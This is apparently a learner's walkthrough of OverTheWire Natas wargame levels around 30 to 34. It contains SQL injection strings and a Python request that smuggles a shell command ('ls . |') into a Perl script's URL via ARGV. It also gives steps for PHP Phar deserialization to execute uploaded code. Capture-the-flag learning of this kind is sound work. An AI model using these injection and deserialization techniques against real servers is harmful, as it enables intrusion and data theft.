1234' OR '1'='1or1234" OR "1"="1 - ~quote~ will escape any special characters so this won't work
- Unsanitized input to
quote=> passing a list sets the data type of the input and based on the type quotes would not be added for say numeric types - Used python for the request, used SQL_INTEGER and SQL_NUMERIC first, didn't work
- Found data type codes used by DBI
31 ➜ 32
- It was interesting to research this out
- The attack is exactly described in The Perl Jam
def threeonetothreetwo():
import requests
headers = {
'Authorization': '<header>'
}
r = requests.post('http://natas31.natas.labs.overthewire.org/index.pl?ls . |', headers=headers, files={'file':'file.test'}, data={'file':'ARGV'})
print(r.text)
32 ➜ 33
- Use the same exploit as before
lsand then run whatever you find
33 ➜ 34
- This was a very interesting and learnable level as well
- Observe the code carefully and look up exploits for functions that are being used
- Turns out
md5_fileis exploitable using https://blog.ripstech.com/2018/new-php-exploitation-technique/ - The key point to remember is that creating a Phar with the right code as
metadatawill cause the code to execute upon opening it and give the password. - Create a pass.php with code that reads the password file and upload it by forcing the uploaded name to
pass.phpby mutating the upload form - This will be used by the Executor object so that it's contents are executed when __destruct() is executed. Calculate the md5 for pass.php so that the
ifcheck passes - Package the Executor object as a Phar, specify a dummy stream like
test.txt - Upload the phar while enforcing the filename
- Now upload a file with the name
phar://<phar-filename>/<stream>with binary of the phar file - The password would now be visible
And that's all! I learned a bunch of things while doing this. No doubt I got stuck a few times, and had to take a little help from here and there, but yeah got to know about a bunch of new things...